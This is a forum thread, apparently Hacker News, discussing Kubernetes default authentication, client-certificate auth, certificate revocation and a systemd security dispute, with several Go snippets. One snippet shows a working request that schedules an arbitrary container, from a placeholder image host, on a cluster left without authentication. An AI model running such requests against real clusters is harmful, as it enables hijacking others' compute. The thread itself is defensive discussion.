To be fair, Kubernetes itself and most distributions are quite secure by default. So with Kubernetes it's not the same situation as with the NoSQL databases that shipped without authentication and got bound to the internet.

I'm not familiar with enough distributions to know if there is a popular one that totally disables authentication by default, but in my company's distribution, in kubeadm clusters, and I suspect in all managed clusters (GKE/EKS/AKS/etc.), the vector outlined in the article would only work if an admin specifically disabled authentication.

In Gravity (my company's distribution), we even disable anonymous-auth, so someone would have to do real work to open API access to the internet.
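
If you want to see what a given cluster actually does with unauthenticated requests, a quick probe is enough. A rough sketch in Go (the address is a placeholder, and the status interpretation reflects typical kubeadm-style defaults, so treat it as an assumption rather than a guarantee):

    // probe.go: see how an apiserver answers an unauthenticated request.
    // 203.0.113.10:6443 is a placeholder; 6443 is the usual apiserver port.
    package main

    import (
        "crypto/tls"
        "fmt"
        "net/http"
    )

    func main() {
        client := &http.Client{
            // Skip server cert verification only because we're probing, not trusting.
            Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}},
        }
        resp, err := client.Get("https://203.0.113.10:6443/api/v1/namespaces")
        if err != nil {
            panic(err)
        }
        defer resp.Body.Close()
        // 401: anonymous requests are rejected outright (anonymous-auth off).
        // 403: anonymous requests are mapped to system:anonymous and denied by RBAC.
        // 200: someone really did disable authentication/authorization.
        fmt.Println("status:", resp.Status)
    }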




Indeed, modern versions of Kubernetes are fairly solid on network security against unauthenticated attackers.

That said, it's not that long ago that a lot of distros were shipping unauthenticated kubelets, and I think that's where a lot of these incidents will come from.

From cluster reviews I've done, problems like this tend to arise where people are using older versions (so early adopters) or have hand-rolled their clusters, not realising all the areas that require hardening.


How do you provide your initial credentials, though? Providing decently secure default initial credentials is possible, but tricky.

And that's where I'll turn around 180 degrees and say: If you can't give me a hard reason why you'll be a hard target on the internet, you shouldn't have a public address. Default authentication isn't enough.

I dislike trusting my edge firewall, but it gives me time to handle weak internal systems.


Kubernetes only accepts very limited forms of auth by default.

Typically, it's limited to client certificates signed by the cluster CA that the apiserver is configured to trust.

Client cert auth over TLS is pretty damn secure. I expose my Kubernetes cluster's apiserver to the internet and have, to my knowledge, had no issues yet.
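
For anyone wondering how identity is derived from the cert: the apiserver accepts certs that chain to the cluster CA and takes the username from the CN and group memberships from the O fields. A rough sketch of that check in Go (just the mechanism in miniature, not Kubernetes' actual authenticator; the file names are placeholders and error handling is minimal):

    // Sketch of x509 client-cert auth: accept only certs that chain to the CA,
    // then read the user from CN and groups from O.
    package main

    import (
        "crypto/x509"
        "encoding/pem"
        "fmt"
        "os"
    )

    func identityFromClientCert(caPEM, clientPEM []byte) (user string, groups []string, err error) {
        roots := x509.NewCertPool()
        if !roots.AppendCertsFromPEM(caPEM) {
            return "", nil, fmt.Errorf("bad CA PEM")
        }
        block, _ := pem.Decode(clientPEM)
        if block == nil {
            return "", nil, fmt.Errorf("bad client PEM")
        }
        cert, err := x509.ParseCertificate(block.Bytes)
        if err != nil {
            return "", nil, err
        }
        // Reject anything not signed by the cluster CA.
        if _, err := cert.Verify(x509.VerifyOptions{
            Roots:     roots,
            KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
        }); err != nil {
            return "", nil, err
        }
        return cert.Subject.CommonName, cert.Subject.Organization, nil
    }

    func main() {
        ca, _ := os.ReadFile("ca.crt")         // the CA the apiserver trusts (placeholder path)
        client, _ := os.ReadFile("client.crt") // a user's cert (placeholder path)
        user, groups, err := identityFromClientCert(ca, client)
        fmt.Println(user, groups, err)
    }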


Client cert auth is quite good against unauthenticated attacks but has its downsides.

At the moment Kubernetes has no certificate revocation process at all, so if one of your users has their cert stolen on an Internet-facing cluster, you'll have to rebuild the entire CA and re-issue all certs to get around the problem.
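
For a sense of what that re-issue actually involves, here's a bare-bones sketch with plain crypto/x509 (not how kubeadm manages certs; the names, lifetimes, and error handling are made up for illustration):

    // Sketch of "rebuild the CA and re-issue certs": a fresh CA, then a fresh
    // client cert signed by it. Errors are ignored for brevity.
    package main

    import (
        "crypto/ecdsa"
        "crypto/elliptic"
        "crypto/rand"
        "crypto/x509"
        "crypto/x509/pkix"
        "fmt"
        "math/big"
        "time"
    )

    func main() {
        // 1. A brand new CA key and self-signed CA cert.
        caKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
        caTmpl := &x509.Certificate{
            SerialNumber:          big.NewInt(1),
            Subject:               pkix.Name{CommonName: "kubernetes-ca-v2"},
            NotBefore:             time.Now(),
            NotAfter:              time.Now().AddDate(10, 0, 0),
            KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
            BasicConstraintsValid: true,
            IsCA:                  true,
        }
        caDER, _ := x509.CreateCertificate(rand.Reader, caTmpl, caTmpl, &caKey.PublicKey, caKey)
        caCert, _ := x509.ParseCertificate(caDER)

        // 2. Re-issue a user cert: CN becomes the username, O the group.
        userKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
        userTmpl := &x509.Certificate{
            SerialNumber: big.NewInt(2),
            Subject:      pkix.Name{CommonName: "alice", Organization: []string{"dev-team"}},
            NotBefore:    time.Now(),
            NotAfter:     time.Now().AddDate(1, 0, 0),
            KeyUsage:     x509.KeyUsageDigitalSignature,
            ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
        }
        userDER, _ := x509.CreateCertificate(rand.Reader, userTmpl, caCert, &userKey.PublicKey, caKey)
        fmt.Println("new CA:", len(caDER), "bytes, new user cert:", len(userDER), "bytes")
        // Repeat step 2 for every user and component, swap the CA bundle on the
        // apiserver, and only then is the stolen cert useless.
    }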


Yeah, client certs are a good, hard reason. In fact, now that I think of it, the services we expose to the internet all deploy mutual TLS authentication.


I strongly suspect we're going to encounter quite a few instances of admins (or individual developers, depending on how poorly-secured a given corporate network is) installing Kubernetes to test and play with, disabling auth for simplicity of testing, and then completely forgetting they have it installed or failing to properly shut it down and uninstall it.

They may consider that fine for security (the equivalent of having an insecure MySQL install on a machine with no tables of value in it), but may forget that even an empty Kubernetes install still lets attackers dictate what your CPU is doing.
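
To make that concrete: against a cluster someone has left open, "dictating what your CPU is doing" is a single API call. A sketch (the address and image are placeholders; any sanely configured cluster answers this with a 401 or 403):

    // Why an "empty" cluster is still valuable to an attacker: if the API is
    // open, one POST schedules an arbitrary container.
    package main

    import (
        "bytes"
        "crypto/tls"
        "fmt"
        "net/http"
    )

    func main() {
        pod := []byte(`{
          "apiVersion": "v1",
          "kind": "Pod",
          "metadata": {"name": "borrowed-cpu"},
          "spec": {"containers": [{"name": "work", "image": "example.invalid/cpu-burner"}]}
        }`)
        client := &http.Client{
            Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}},
        }
        resp, err := client.Post(
            "https://203.0.113.10:6443/api/v1/namespaces/default/pods",
            "application/json",
            bytes.NewReader(pod),
        )
        if err != nil {
            panic(err)
        }
        defer resp.Body.Close()
        fmt.Println("status:", resp.Status) // 201 Created only on an open cluster; 401/403 otherwise
    }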


You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Secure defaults are irrelevant if you pay attention to the news.


> You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Interesting. I've got a few OpenBSD boxes that aren't affected by vulnerabilities nearly so often.

It turns out that if you practice defence in depth, the majority of security vulnerabilities in the news have no impact on you.

For example, on my OpenBSD boxes I have only a single user. I do not run any untrusted code. That means Spectre/Meltdown doesn't actually impact me, because no one can run code that could perform such a timing attack.

There was a recent OpenBSD/Xorg security issue. I didn't have X installed, and even if I did, since it's only a single-user server, it again wouldn't have impacted me (privilege escalation means nothing when everyone is effectively root in my threat model).

Not all vulnerabilities are created equal, and with enough good practices it's possible to have boxes that stay secure for years and years with no need for patches.


Yep. The bloated, overhyped and churny mainstream crap needs updating all the time (and it kinda tends to break too). Build on that, and hope the updates get done before someone fires an exploit. That's defense in "pray and hope we're faster."

I'm not so concerned about my OpenBSD box with >800 days of uptime, which runs very limited and carefully selected services.


On this point, it's worth noting that the Kubernetes support lifecycle is currently 9 months, so you need to plan not only for bugfixes but for full upgrades, fairly regularly.


To be fair, you're playing with fire if you rely on product security to be perfect. For every SSHd out there, there are multiple SystemD or worse security products.


I think you meant "OpenSSH", not SSHd, and "systemd" is always spelled lowercase. The 'd' doesn't stand for anything and is never capitalized.

"sshd" is an ambiguous term as there are many ssh daemons, from the libssh server to dropbear to OpenSSH, and OpenSSH is likely the one that you use and the most secure one.

systemd has had a few security incidents, but very few of them are actually a big deal. People have overblown each and every one, since a cult of systemd hate has formed, which has muddied the waters significantly.

> you're playing with fire if you rely on product security to be perfect

That's a vacuous statement; of course you can't rely on everything being perfect, so you must practice defence in depth. Everyone already knows software sometimes has bugs.

The point of the parent post is that Kubernetes does intend to allow secure use while being exposed publicly (unlike, e.g., the default Redis configuration). The parent post does not claim it is perfect or that you must never patch it, merely that it is reasonable and can be hardened.

In the end, there are tradeoffs. You must decide that the convenience of developers being able to ssh into machines is worth the risk of running OpenSSH. You must decide that using Google Apps is worth the risk that Google will have a data breach exposing all of your confidential information. You must decide that Slack can be trusted to write secure enough PHP that your messages aren't being read by others.

Just because something isn't perfect doesn't mean that it can't still be a good tradeoff based on the expected risk.


> "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

I thought the 'd' was a holdover from "daemon", as in initd or setsid, as a general name for a background process. systemd is a little more than just a background process but it's sort of the same idea.

From the wiki page: "In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned the init process (process number 1) as its parent process and has no controlling terminal. However, more generally a daemon may be any background process, whether a child of the init process or not. "

https://en.wikipedia.org/wiki/Daemon_(computing)


From their documentation [0]:

> Yes, it is written systemd, not system D or System D, or even SystemD .... [You may also, optionally] call it (but never spell it!) System Five Hundred since D is the roman numeral for 500 (this also clarifies the relation to System V, right?).

The 'd' is a pun both on daemons conventionally being suffixed with 'd' and on D being the Roman numeral for 500. Officially, though, it doesn't directly stand for either.

[0]: https://www.freedesktop.org/wiki/Software/systemd/


While naming trivia is interesting, it is a fact that systemd has had its fair share of security problems. And while it is a fact that OpenSSH is more mature, systemd has some issues with recognizing security failures as such: https://www.reddit.com/r/linux/comments/6mykng/that_systemd_...


That is a perfect example of security FUD around systemd.

The attack vector is what? Someone manages to convince an administrator to write a service that has "User=0foo" in it?

If an attacker has access to write into `/etc/systemd/system` then they already have root on the system.

If an attacker can cause an administrator to write a systemd unit and the administrator isn't checking that it's reasonable, the attacker could just have the `ExecStart` line run a 'sploit and not have a `User` line at all.

Seriously, what is the attack that you imagine where this has a security impact?

As Poettering said on that issue, no one should be running system services under usernames starting with digits, and such usernames are of questionable validity in the first place.

People have still blown it out of proportion because it's systemd.

Note that a similar issue exists in the old SysV init scripts: they run as root, and if you convince the person writing an init script to leave out the `start-stop-daemon -u username` flag, the daemon will run as root. Basically identical, but it never got a CVE, because no one seriously considers "I talked my sysadmin into running something as root" a privilege escalation by itself.
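
If it helps, here's a toy model of the behaviour being argued about (explicitly not systemd's code, just the logic in miniature): an invalid User= value gets dropped, and a system service with no valid User= runs as the default, root.

    // Toy model of the "User=0foo" complaint: an invalid username is ignored,
    // so the unit falls back to the default for system services, which is root.
    package main

    import (
        "fmt"
        "unicode"
    )

    // validUserName mirrors the rule in question: names may not start with a digit.
    func validUserName(name string) bool {
        if name == "" {
            return false
        }
        return !unicode.IsDigit(rune(name[0]))
    }

    // effectiveUser returns who the service would actually run as.
    func effectiveUser(unitUser string) string {
        if unitUser == "" || !validUserName(unitUser) {
            return "root" // invalid value is dropped; the default is kept
        }
        return unitUser
    }

    func main() {
        fmt.Println(effectiveUser("postgres")) // postgres
        fmt.Println(effectiveUser("0foo"))     // root
    }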


Yes, I meant OpenSSH



